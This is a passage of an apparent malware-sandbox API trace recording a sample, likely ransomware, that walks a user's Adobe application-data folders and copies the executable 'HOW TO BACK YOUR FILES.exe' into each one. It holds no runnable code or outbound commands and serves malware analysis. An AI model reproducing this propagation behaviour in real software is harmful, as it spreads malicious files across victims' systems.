BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\adobe\\acrobat\\10.0\\cache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.658] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.658] GetLastError () returned 0x0 [0106.658] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.658] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.658] CloseHandle (hObject=0x120) returned 1 [0106.658] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.658] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.658] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecb5bdd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0x710603e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x710603e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.658] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.658] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.659] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe" [0106.659] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e95b0 | out: hHeap=0x2b0000) returned 1 [0106.659] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0106.659] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe") returned 67 [0106.659] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe" [0106.659] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.659] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\adobe\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.659] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.660] GetLastError () returned 0x0 [0106.660] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.660] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.660] CloseHandle (hObject=0x120) returned 1 [0106.660] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.660] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.660] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4febe4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4febe4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.660] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.660] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.660] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe\\Color", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe\\Color") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe\\Color" [0106.660] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x335068 | out: hHeap=0x2b0000) returned 1 [0106.660] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7bc8 | out: hHeap=0x2b0000) returned 1 [0106.660] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe\\Color") returned 73 [0106.660] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe\\Color" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe\\Color") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe\\Color" [0106.660] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.660] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe\\Color\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\adobe\\color\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.661] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.661] GetLastError () returned 0x0 [0106.661] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.661] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.661] CloseHandle (hObject=0x120) returned 1 [0106.662] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.662] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.662] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe\\Color\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x70bc3940, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x70bc3940, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.662] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.662] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.662] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe\\Color\\Profiles", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe\\Color\\Profiles") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe\\Color\\Profiles" [0106.662] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0106.662] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7bc8 | out: hHeap=0x2b0000) returned 1 [0106.662] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe\\Color\\Profiles") returned 82 [0106.662] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe\\Color\\Profiles" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe\\Color\\Profiles") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe\\Color\\Profiles" [0106.662] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.662] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe\\Color\\Profiles\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\adobe\\color\\profiles\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.663] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.663] GetLastError () returned 0x0 [0106.663] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.663] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.663] CloseHandle (hObject=0x120) returned 1 [0106.663] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.663] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.663] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe\\Color\\Profiles\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xce4463a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x70cce2e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x70cce2e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.663] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.664] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.664] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe\\Acrobat", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe\\Acrobat") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe\\Acrobat" [0106.664] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x334fc8 | out: hHeap=0x2b0000) returned 1 [0106.664] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0106.664] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe\\Acrobat") returned 75 [0106.664] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe\\Acrobat" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe\\Acrobat") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe\\Acrobat" [0106.664] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.664] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe\\Acrobat\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\adobe\\acrobat\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.665] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.665] GetLastError () returned 0x0 [0106.665] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.665] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.665] CloseHandle (hObject=0x120) returned 1 [0106.665] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.665] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.665] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe\\Acrobat\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4febe4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4febe4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.665] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.665] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.665] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe\\Acrobat\\10.0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe\\Acrobat\\10.0" [0106.665] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0106.665] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0106.665] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe\\Acrobat\\10.0") returned 80 [0106.666] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe\\Acrobat\\10.0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe\\Acrobat\\10.0" [0106.666] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.666] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe\\Acrobat\\10.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\adobe\\acrobat\\10.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.666] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.667] GetLastError () returned 0x0 [0106.667] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.667] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.668] CloseHandle (hObject=0x120) returned 1 [0106.668] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.668] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.668] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7103a280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x7103a280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.668] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.668] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.669] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe\\Acrobat\\10.0\\Cache", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe\\Acrobat\\10.0\\Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe\\Acrobat\\10.0\\Cache" [0106.669] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8890 | out: hHeap=0x2b0000) returned 1 [0106.670] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0106.670] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe\\Acrobat\\10.0\\Cache") returned 86 [0106.671] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe\\Acrobat\\10.0\\Cache" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe\\Acrobat\\10.0\\Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe\\Acrobat\\10.0\\Cache" [0106.671] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.671] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe\\Acrobat\\10.0\\Cache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\adobe\\acrobat\\10.0\\cache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.672] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.673] GetLastError () returned 0x0 [0106.673] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.673] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.673] CloseHandle (hObject=0x120) returned 1 [0106.673] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.673] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.674] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Adobe\\Acrobat\\10.0\\Cache\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecb5bdd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0x710603e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x710603e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.674] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.674] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.674] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe" [0106.675] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0106.675] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0106.675] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe") returned 50 [0106.675] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe" [0106.675] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.676] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\adobe\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.676] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.676] GetLastError () returned 0x0 [0106.676] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.677] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.677] CloseHandle (hObject=0x120) returned 1 [0106.677] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.677] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.677] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4febe4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4febe4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.677] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.677] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.677] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe\\Color", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe\\Color") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe\\Color" 